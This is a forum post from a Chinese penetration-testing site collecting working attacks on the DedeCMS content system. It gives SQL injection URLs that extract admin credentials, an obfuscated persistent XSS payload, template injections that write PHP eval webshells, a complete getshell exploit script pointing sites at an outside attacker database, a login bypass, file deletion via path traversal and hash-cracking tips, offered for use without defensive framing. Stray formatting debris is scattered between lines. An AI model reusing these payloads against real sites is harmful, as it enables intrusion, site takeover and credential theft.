中国网络渗透测试联盟

标题: dedecms漏洞总结 [打印本页]
作者: admin    时间: 2012-10-18 10:42
标题: dedecms漏洞总结
2 S) F7 h4 G0 p9 V0 a  J# U- }
Dedecms 5.6 rss注入漏洞
% D- d% N& x9 ~4 w  ^http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
) x: `1 q9 }( T6 W7 V8 V) z  O
9 a# Q) A% r' d: X2 q# X8 P  x  h) k& H0 {- Y: o8 y* V; y: f
/ ?+ W4 |% S, _: m% X4 x9 s( F

0 }) I( o% T( E: \; [( u, |% K4 O/ ?& ]$ h, r$ h: Y

2 g- q+ \0 Z* T6 R& z- L
! x% G8 }; }! S6 i& v% c
! X' ^$ d, Z+ P7 f% Y" ?- SDedeCms v5.6 嵌入恶意代码执行漏洞# _! v& P. c3 s! O
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}' C9 U% ?9 ~2 y4 ^( @
发表后查看或修改即可执行% R) Z' @* _6 U" \
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}! m9 h0 z* [! a8 X/ X  h
生成x.php 密码xiao,直接生成一句话。5 B9 x1 K$ A( p) `0 _
: S( C4 R6 g% h  ~; C# g" I

2 s0 b- h3 l" E: b, e8 J+ F+ e0 U% c
" Q) I; c, M% C& h

: q( ~/ p" q" D- D  v7 K  q9 [* E8 l$ O4 ~9 y* d. d0 K: j  P* p
4 P& N1 f# K. c- R8 [
4 a& m' |1 v  W. z
Dede 5.6 GBK SQL注入漏洞" b. A. ?( ^+ ~" h9 z* I' W/ |7 V  v
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
( y, T8 J  Z0 x) q4 uhttp://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
* a9 g: i! v0 R" ~, T2 N. Bhttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
4 r. ^/ q$ {9 g( H& _( p0 R  o+ V7 I: r8 l: k- v

$ i" I6 d# Q7 w4 a+ O5 i) I; E$ v5 F( h: `. S+ a$ a. y
9 W- Y, t- c0 T) k5 N  E
# @9 e7 K. j5 i% q, @
# p, Y& }" h* H' M6 T5 o$ I

# ^/ |- O: f/ p1 t
( p$ I# w- T$ W5 z' ~; N2 RDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞8 l0 v- @! w; n. A8 L
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` $ b( E' p! [4 V/ R' N

% Z" g% k+ T( c. O! t7 D+ z! Q1 Y
9 y. u. B  F5 C7 @1 O. e  n" |" f1 f+ M

0 s4 g# P5 u& N7 D7 c1 f% ?9 `  X
6 y. f. E0 l3 d3 D8 w  i2 i( u
. E0 a4 _& ^/ D3 V4 ]; q6 cDEDECMS 全版本 gotopage变量XSS漏洞: a9 c( q6 j8 Y) n8 W# V
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 . F$ w2 H+ L8 R' f: E4 \* s0 C+ m
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
4 C: i$ W: v1 Y- o% t6 M* W& ~- e: i- |* j9 ^
# }4 x  C4 p: N+ O
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
+ Q6 K/ T6 [8 U6 m8 y6 m9 Mhttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda& j) R- g8 Z5 t' |0 `* v! z
, c4 n/ [% S  F7 N& o+ K
$ e+ \" U7 H- m8 D
http://v57.demo.dedecms.com/dede/login.php4 F  c2 e- M1 ?4 w$ G
# \" s5 u+ R- V  _
8 ]4 F: ^* {# n+ M4 P% l7 _
color=Red]DeDeCMS(织梦)变量覆盖getshell
* Z" J; P- ^$ @4 j) i# X% q& k#!usr/bin/php -w
1 h+ z( c1 r& V- F5 s<?php2 d+ y& M8 c$ C3 b
error_reporting(E_ERROR);; e( e' U% c4 ]
set_time_limit(0);- B" p8 A: e' N; R, I
print_r('
8 W$ E. ?  [+ Z7 oDEDEcms Variable Coverage: k1 d% f$ ]! m% Y0 t+ s( s
Exploit Author: www.heixiaozi.comwww.webvul.com
5 f( Z5 d3 A9 N9 G& M+ h1 T);
1 _( x* c" A) Kecho "\r\n";6 h) A7 I' t: `2 ]9 ^& a. ^
if($argv[2]==null){
3 ]: Q3 Y+ Y( L: p! c7 }print_r('6 c% ~1 @" e3 t6 _2 l, t2 i
+---------------------------------------------------------------------------+9 Z) I7 F) i& z8 M* @
Usage: php '.$argv[0].' url aid path: `1 ~0 d1 _  R8 o
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
6 d4 ?+ U% o1 f/ \2 _5 CExample:
3 g- f  P; y2 [+ T9 Zphp '.$argv[0].' www.site.com 1 old+ J& K8 R( k$ K( X: c
+---------------------------------------------------------------------------+/ u# f  U( p& e- X+ C
');$ u2 R# Q5 `8 _, L
exit;
" s2 G  Y: k! Q4 C5 U7 o}9 E0 \. p+ i' Z& E" W5 D
$url=$argv[1];# D+ n$ V) U5 d
$aid=$argv[2];
0 B/ e$ U* O3 f5 m; t$path=$argv[3];
2 M$ J  H5 E4 O" Q% K$exp=Getshell($url,$aid,$path);* j: J' M$ j# w2 D4 y
if (strpos($exp,"OK")>12){8 h2 u9 w- i) }/ P' o0 F# m
echo "8 c2 u6 a& S& u( O8 K- G
Exploit Success \n";
- q& h6 Q5 ]5 S1 tif($aid==1)echo "
, B6 U2 p+ M, a, g) F9 ?( m: e0 ?, pShell:".$url."/$path/data/cache/fuck.php\n" ;
( |5 r5 J2 V( ~% t# `8 H& l5 |, r/ I; `5 P7 f; x, V4 e" p

$ k( l& [: E. Yif($aid==2)echo "
- b: q4 Z: M& K. x# n$ o* PShell:".$url."/$path/fuck.php\n" ;. ]/ O: T5 A+ p& p, W+ E
5 U; N$ g7 y' j0 N

% U3 b9 T7 N8 n3 l: o$ g+ Sif($aid==3)echo "4 }' y0 P$ A1 J" }% i3 q* T+ e
Shell:".$url."/$path/plus/fuck.php\n";
' a* }9 f2 X! f( \- T' }: W0 ~
3 L3 R) q7 d; N% n! s4 m2 b: W
}else{4 E) Q( }1 n$ r/ M2 S. u- @
echo "
$ m  a3 M3 p$ z! ]6 I8 ?' ZExploit Failed \n";7 Y" j' m  _% i' J% M5 C9 i5 u. d8 w: X
}# `  y# E2 M0 \1 O" D9 E
function Getshell($url,$aid,$path){
% R+ t) D; J3 ^0 l$id=$aid;
3 m0 G' m" v' H1 D: U0 t$host=$url;. |$ G* n& C- w" g; `
$port="80";4 E  c, ~: J- v: z
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
3 z' @: g* T9 W; N! `$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";. V2 ?- L2 p# f* W6 N
$data .= "Host: ".$host."\r\n";
" }8 y! k; q# Y; {$ k7 k! t( r$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
, R& |- d2 K6 h! _$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
/ i1 r3 e* P/ y* I$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
; t4 A" x0 ~) V6 _3 j, {//$data .= "Accept-Encoding: gzip,deflate\r\n";
8 X# p" D( J" Z& ~( w! H$ R2 a$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";- x0 t- p# U9 m  x! A
$data .= "Connection: keep-alive\r\n";4 V/ m' e4 ^* R5 C  e' P
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$ N- D, Y. W0 j4 P* P$data .= "Content-Length: ".strlen($content)."\r\n\r\n";- |8 _$ X* o7 t" G% T, F- i
$data .= $content."\r\n";
- `+ y* Y3 s5 V  P# b$ock=fsockopen($host,$port);( ?+ r: ]+ h" ]7 ]$ U. }3 t/ p
if (!$ock) {# G# V& x, N5 v2 `3 q
echo "
' I5 T3 r* H# xNo response from ".$host."\n";" I2 d' @. A) d& q
}+ u4 L' i" S* r* h* n, o
fwrite($ock,$data);
9 z4 Z7 P% K- J8 B* dwhile (!feof($ock)) {; Q6 _3 x$ p; N" ~9 y8 P
$exp=fgets($ock, 1024);4 o  @8 E4 O; r/ x  {' f) u
return $exp;" L1 L# Z+ I- @9 E. d
}
2 l1 C  W* {1 h3 d; H}5 Y! N) q4 F1 d+ y' n! D

; c9 r& N3 O, D) d3 f: l! P5 q# O
- Z3 l+ L1 K$ B. E% m+ }) t) v?>% A5 u* S0 Z, U) c6 o7 q
% ]! d. y; t$ L

/ Z. ^8 y# @2 g- ]% \1 A6 |7 U, G6 s2 N% H" L8 o, Z
  S7 M+ b( W/ g. L! H1 u# m
0 n6 o6 c2 @4 ~  V+ D

4 n& ^+ V8 y; v
/ W  I- {+ y. \2 @  b+ U0 }9 K& [: T" J& V1 X0 {8 N; k
" g6 r& D* t- K) i- u% g5 `
% B% R' B' Y! c- E* I
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)! @  D9 Q( _2 h. C( t# u
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root; |( x+ {' H: e9 E. S  a

8 o8 q& X  y! f0 Z, ^
4 P) P  ~1 ]* E. M把上面validate=dcug改为当前的验证码,即可直接进入网站后台$ ?  U4 t( O' o  C+ L2 y$ m4 d

2 }; G( R; g" T7 H2 ^) w; K' n4 Q& Z4 R( T
此漏洞的前提是必须得到后台路径才能实现
: Z4 g' Y7 R$ p. X" N4 ]
! L: W" q. f7 V2 t$ {
/ J- U! u' s7 o5 i/ {; j+ [6 s5 @5 o7 l! P3 a" F
* Z, H8 z& E, R+ l% `  @' d5 X
* K, u; w5 _0 F7 F+ G: L9 \& k& ^( a
9 f' B, W; \  E' D' h: ?

0 j' S6 @2 u+ O; V% G% J3 N7 I, ]0 k. P' w& @5 B3 z
' }$ j( X* T  V9 o! }/ A0 R

) X6 c! t  h8 G6 q! V2 [' N3 HDedecms织梦 标签远程文件写入漏洞
. v; b6 _. o8 H  ~前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
6 C9 l' W& U& r  |1 }$ ]5 J  r$ o$ B$ g& i# n
( K! C" o! x9 Q  ]6 R. o5 t
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
+ R7 |5 c; _+ A1 |2 g. I<form action="" method="post" name="QuickSearch" id="QuickSearch">
6 _" B' d" O0 c) \( e8 u  ^& A- M<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
, F, n- A+ {: B( ^- \<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />3 w# W, f7 q1 N/ e
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />5 g+ b& V0 L( z& p  h% A6 U) K
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
- F0 b( U+ f6 E: r# `% X<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />- F! a3 _! h( }; ~6 @
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />4 _4 M, k/ r9 ]7 v  j
<input type="text" value="true" name="nocache" style="width:400">
& P; E# R2 p. J4 Y& e# q8 I$ n1 `2 w<input type="submit" value="提交" name="QuickSearchBtn"><br />
1 T" n, E% x! H# v' r; c; D</form>
" ], b4 @: `' o4 j& t" |. |. [<script>
7 C& c8 J+ W- l5 kfunction addaction()% |% B1 @0 ~4 D3 W0 i" z
{
# [& N7 s4 Q9 `) M9 M4 \4 w& L: p, ldocument.QuickSearch.action=document.QuickSearch.doaction.value;0 _8 R' E; O) ]" h
}- C) X& K7 u# o
</script>
2 `9 U( z8 P/ R& q- e* g" l9 w- f  ^$ f( e
  o8 {3 M, h: r: B9 i/ n# Y

* _$ r3 X. R+ K7 P( l' o4 G  ~0 g/ {+ U9 s3 y0 g) h

# s& A6 Z# g% ~) g7 O3 L
* w) L' T" \/ ?- u9 M! a3 \3 D0 N3 h

  T. O+ e7 q0 V' T! P, {8 N+ A4 `0 O

# E: n7 r  j0 @0 mDedeCms v5.6 嵌入恶意代码执行漏洞9 M1 ]9 R0 \' ~
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
% ?7 ^, Q: ~- x& A$ Ma{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
. [; t/ K, {7 e: u生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得- ~9 u7 \; R3 c: e. [1 S' x, ^
Dedecms <= V5.6 Final模板执行漏洞
& @6 u* g) S' |1 d: r2 W注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
4 D0 y  N7 h, n2 Z" C# Guploads/userup/2/12OMX04-15A.jpg
* v1 W) q, T5 [* i6 s1 h
* S) o& ~8 w/ `' \" n4 L  t9 f# z8 E- Y& K7 ^; V0 u- d" o; o5 U6 h
模板内容是(如果限制图片格式,加gif89a):& W% N( I. d& h3 E3 G
{dede:name runphp='yes'}
# b  |- v- v9 b+ ]% G$fp = @fopen("1.php", 'a');9 c( I0 d2 E! r( c" z, Y& ?
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
+ t4 z) E$ [, @3 j& g@fclose($fp);
3 \; R+ E. I6 H3 Y7 B% ^{/dede:name}- @* P. U4 f+ W( v' U. m! A
2 修改刚刚发表的文章,查看源文件,构造一个表单:
: y- U) i3 U) E9 {- D<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">3 f5 u3 \' D) i; Z  G2 C- Q
<input type="hidden" name="dopost" value="save" />. O. i1 |! [% i
<input type="hidden" name="aid" value="2" />6 i' u9 s, p" z
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />  N; i- \; e& n4 y' e) x# K( q
<input type="hidden" name="channelid" value="1" />
9 f  [9 b/ @* W8 P" b/ g4 }<input type="hidden" name="oldlitpic" value="" />
8 R" s0 o8 G. G1 v% O2 p. X<input type="hidden" name="sortrank" value="1275972263" />+ S( P# w2 e6 n: _4 K3 T

4 z0 Y1 h+ H1 X% A* Q% Z4 _0 f) o0 B: k" B/ Z: U" x% M
<div id="mainCp">
7 y5 M: i3 R+ {# O' V- }<h3 class="meTitle"><strong>修改文章</strong></h3>
; m; g) }( ]+ D7 n4 d) Y1 V" q9 }: E& E

2 V1 G0 T! ^: B0 L4 _<div class="postForm">4 Y2 }1 n/ ^# E
<label>标题:</label>
& A1 Q# d% Z. d& S! `) j& s<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>, b9 H* J3 H; i9 E# r

+ K0 d  D* f% _' V/ X4 T5 {# X) Z) Q( R/ {
<label>标签TAG:</label>
7 m' Q8 Z& ]1 w, T( N' |( \<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)' ~: \/ I4 D4 Z( q  m

# ?6 h$ u/ ]' S
5 _* Z+ S- ?0 f# z4 B  p<label>作者:</label>
. `6 O0 `2 @- N# J3 P<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
& B  `6 R$ E4 R
  K' k. `! O  b( }; v4 K8 M  t) |# C% D8 {0 ^! s
<label>隶属栏目:</label>
6 b, `! v! d) N6 ^/ e. F<select name='typeid' size='1'>1 f" j6 D8 w4 f( ?4 x
<option value='1' class='option3' selected=''>测试栏目</option>$ w4 t- }. q, [. q4 U8 t3 g
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类): O5 O: U: s% W" H% f

$ w: v% ]  W4 K4 a
6 P4 H0 H; W' l, U<label>我的分类:</label>$ w+ {  ^. F% R
<select name='mtypesid' size='1'>
1 z6 }+ J: m2 {! {) |' ^( D% b( `<option value='0' selected>请选择分类...</option>& v% v0 J3 Z" F- b; ~$ ^
<option value='1' class='option3' selected>hahahha</option>
4 A& B. h; F# c+ f" p9 F</select>' j* P3 J$ i  f& ~/ |: P
$ y' O  x; a/ E! |1 |4 @1 j

& O) }4 q3 p: u, }2 e+ J<label>信息摘要:</label>  A2 Q) u  p  e0 x5 Z
<textarea name="description" id="description">1111111</textarea>
+ X- ~+ `8 l( J0 i1 x9 n% y(内容的简要说明), v0 z; t$ q. a

* L) T  G5 c- H' f; D& e' Z7 K- m7 V! j. \
<label>缩略图:</label>
! Y% s8 M  t' L1 e<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>, `3 |$ i5 c. o

: `/ N/ A4 l& F2 a5 m1 l. L* Z" n" v
<input type='text' name='templet'
- _0 T) I1 t7 Tvalue="../ uploads/userup/2/12OMX04-15A.jpg">
6 e8 I8 _8 ~4 ^9 e<input type='text' name='dede_addonfields'
( B& l" V+ J% V2 ?1 X8 gvalue="templet,htmltext;">(这里构造)5 o, Z0 S: p3 J. x
</div>) d+ h6 k0 ~) s" u" S, R% W

. v( B$ _9 U7 s3 Y. `
* _9 h( t$ Z2 g2 S0 m/ K6 x& l<!-- 表单操作区域 -->
: c. a0 L; |9 @, L7 f5 r% u5 K<h3 class="meTitle">详细内容</h3>3 ], d' a; i- Q7 k$ F% i
5 i! [6 Z0 m& ?5 A2 d$ g
# b( Z  K0 d$ E( c
<div class="contentShow postForm">" S* ?) K2 @0 a3 R, ?, \
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>6 M! g1 G% |9 z% G1 J
: U0 l! n6 Q% z% p- I0 l% t6 r

- k4 h. ]: C% ?+ C: \' t* ^7 X<label>验证码:</label>
7 W; f6 H2 q1 t7 D$ w<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
$ ?# g5 ]# U6 O. j$ l0 n: g( R9 a<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
# q  J* @, ~' f) w) M0 ?# ~$ x& T4 f2 U; ~7 ~
: `% c5 m! m2 n/ I+ n
<button class="button2" type="submit">提交</button>& W, o; i/ ?+ S
<button class="button2 ml10" type="reset">重置</button>8 W6 Y4 [: c  o6 u! k
</div>6 A0 W4 M. |) e4 B
; W# j* n' M$ P" N9 ]/ C- @

6 T% a, ^$ u4 E</div>. @! [! e( H5 d$ T0 L

3 ^' M1 ^8 Q4 k/ f$ R
& E# C3 v* n. j</form>2 t* z, I6 a6 J4 ^: ^8 ^1 _' _6 m
2 |" w: o0 E, C' f- d
4 D4 d) G% u) W! f  T
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
3 ~! j6 @" |$ o假设刚刚修改的文章的aid为2,则我们只需要访问:3 l! F2 ~2 h4 t
http://127.0.0.1/dede/plus/view.php?aid=2- n. N) J/ f7 d4 Q
即可以在plus目录下生成webshell:1.php9 g; \+ S' I. Q- W; y
3 R9 T# f* r: Y9 S3 w/ P9 R

* h0 r: o1 |1 P* ]; s# g1 \- r; \
/ x9 i& e! |4 @3 o. c
/ y1 g& y9 G; e: k; e
" P5 t0 p; _8 O
2 j) |4 ~4 T( q8 k

2 M/ }/ ^3 n: q- U5 Z; M/ B$ @- ^! b9 H$ S$ w) g( Y
  B% E# |! y3 M0 t
0 P! J3 b# N0 g0 H

, w' Y" T  f( EDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
7 D9 W6 m7 F: T( L4 v3 ZGif89a{dede:field name='toby57' runphp='yes'}3 n& G  k1 Q' ^; _+ q* P
phpinfo();* s7 @# W; p* U* \) w3 E
{/dede:field}/ z$ c6 p5 j, |$ s
保存为1.gif
3 r: t; S: h7 q# }<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
9 j5 B5 B8 i9 o<input type="hidden" name="aid" value="7" /> / Y; P5 r# ?% R: \9 h& d4 p. q. s
<input type="hidden" name="mediatype" value="1" />
+ S2 P: o0 j2 ^0 x<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
+ h+ B3 W- K5 V+ k/ i; j$ w3 ^<input type="hidden" name="dopost" value="save" /> , i. y  n7 A1 q2 \
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> ; {4 R2 j+ Q; k% m& m, N& C
<input name="addonfile" type="file" id="addonfile"/> ( f! X( h$ @$ j) d$ X6 Q* V
<button class="button2" type="submit" >更改</button> 0 c: W6 [( d, k8 m' {" R
</form>
; Z$ K& q# l4 c, a5 s3 x$ A& d5 l( o# W9 F2 Q, \3 B  Y
8 k+ n% W9 b) i, F# _. N  H: Q! @
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif2 q  K) g! h+ |3 J0 Y0 M" l. C) @+ V
发表文章,然后构造修改表单如下:$ _+ P6 ]- {& Y- }; _! R; w. H
) c* `: Z) O8 C+ Z, O! R3 Z

2 F9 c1 }/ v) T& G% L4 ?& z<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
( L0 m0 @" x: \; [0 s& s<input type="hidden" name="dopost" value="save" />
+ b* v8 k6 v, Z4 i: o+ h<input type="hidden" name="aid" value="2" /> * b. j8 k6 r; x# O1 u9 c6 c
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
! b  k% @; ~7 H: {7 p& t2 ~% a<input type="hidden" name="channelid" value="1" /> 6 |% j, ^0 d* D6 M6 D
<input type="hidden" name="oldlitpic" value="" /> ) J2 }: j  _+ c$ q; L
<input type="hidden" name="sortrank" value="1282049150" />
$ O2 L( x0 S5 k5 R5 r4 b, |7 E<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
/ ~7 O- y4 h) s6 I/ f<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> 7 F# ?$ \, M/ Q% o8 H
<select name='typeid' size='1'> 7 I, O% l+ B% A: J! M6 E
<option value='1' class='option3' selected=''>Test</option> - i2 j/ K6 T0 |$ W6 s1 p
<select name='mtypesid' size='1'>
. C! Q8 S1 R; v  E<option value='0' selected>请选择分类...</option> # q; v0 |5 O6 x- ], C; Q
<option value='1' class='option3' selected>aa</option></select> ! y* C' _9 K: ]+ ~7 t7 C  p
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> ! f! `( j6 X+ A! k+ S. i5 y6 [+ a! S
<input type='hidden' name='dede_addonfields' value="templet"> ! @7 v  f! O# k0 \
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> $ S8 ?5 {; P+ W
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
" u: F0 \. V9 l. ^% w2 p1 ^3 u, b<button class="button2" type="submit">提交</button>
. C2 O2 @8 z: t; T8 ]/ U) ^0 [0 W</form>9 v1 N5 j0 O; f$ T- g) ^3 d# E
% I# c8 A# s) n; N. Q

+ {' \2 [/ P; K2 Y3 R8 D# a4 V! ~- E9 b# d7 _* U: {4 @
& c' n! Q$ }/ Y
% j% }% L& r2 f, F0 q
7 S+ G& P- k2 u$ ^1 K

, q0 x7 W& F* E' `6 P
* ^4 R1 H- D! |4 }/ F$ Q* Z+ e  P. k8 ^9 d1 M

' ~8 M4 ^4 F/ o, S" ?6 v
6 J+ m' d% L! ~0 Z
/ [; U" A( `" w" t. g/ j织梦(Dedecms)V5.6 远程文件删除漏洞3 S9 B, J# ?5 S" s. v. o7 `
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
% r& X  w2 o" n. C7 v; k( [. D( V0 p; m" y. I1 U$ q

/ {6 Q' ^: p; D9 P  W+ ?) k& r( c) z% r3 x5 H7 }
) I5 ]8 h5 B+ U' Z2 B
) L1 l4 t, {6 f- [# v5 r5 I

  Q2 F) C: D4 t$ t1 y+ ]4 v1 d9 m% F7 i7 h* f) d

* b( `" i- ]4 Q+ ^/ R) q" z! c6 l% p
9 N* S* @7 i7 \9 _6 S- \- R2 x- I2 A3 M' @! v
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
4 T) O  h6 o; n" Dhttp://www.test.com/plus/carbuya ... urn&code=../../
, Z. v3 l6 _+ l- A6 l' r5 n4 W2 K: a4 i  H" B4 \
) U7 U8 @6 M3 A5 V! ~4 U

0 p9 ~2 C8 ^, h+ K8 s' H9 E+ }9 L& o8 R0 f" L
5 N$ K" z+ M' s- l1 n
) f+ w" p9 W6 h& ?* n. K& l8 O) Z

! E8 X( C8 h; z9 Y* g8 ?0 F) Q2 z/ F8 t

7 l+ F& B( t" F; ~7 b( b: ^; ?, P) b6 ~( [7 L, w9 y: A& V
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
8 G9 C+ W3 E) `8 Xplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
* m/ @/ w7 ^# r  @密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5$ ~% N5 h5 |" W

3 }% d3 [* _# t: I& R
; {8 c. z# ^9 y+ b% f8 o& s9 m
+ j% A5 O: A# U6 |6 v$ a9 V5 V- s6 |
7 [: i$ J. ~& T; f; |  e
+ b1 G1 ], l% S
2 K6 h; j8 U4 s0 w; k
  l) k- g1 Q. X
% Q$ C# K$ r4 |! W; @- c$ t5 A; P  Z" L# d( U4 D8 W% C2 M
: Y7 v9 t6 `% P9 D
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞# B5 d( ~: _# R  S
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
" P% V! X* j2 B2 @* X0 e, _
- Y" r' r5 ?% l& {
! H$ s) Y0 \3 V" |
- v5 x1 w8 B8 t' ~2 a/ l/ A5 K* l( t

  x9 B7 J' }" ^4 Z6 R& \: d2 l( M! J% z. k. M0 H- P) E- R

  u: P6 w( ]+ j  z! a" S
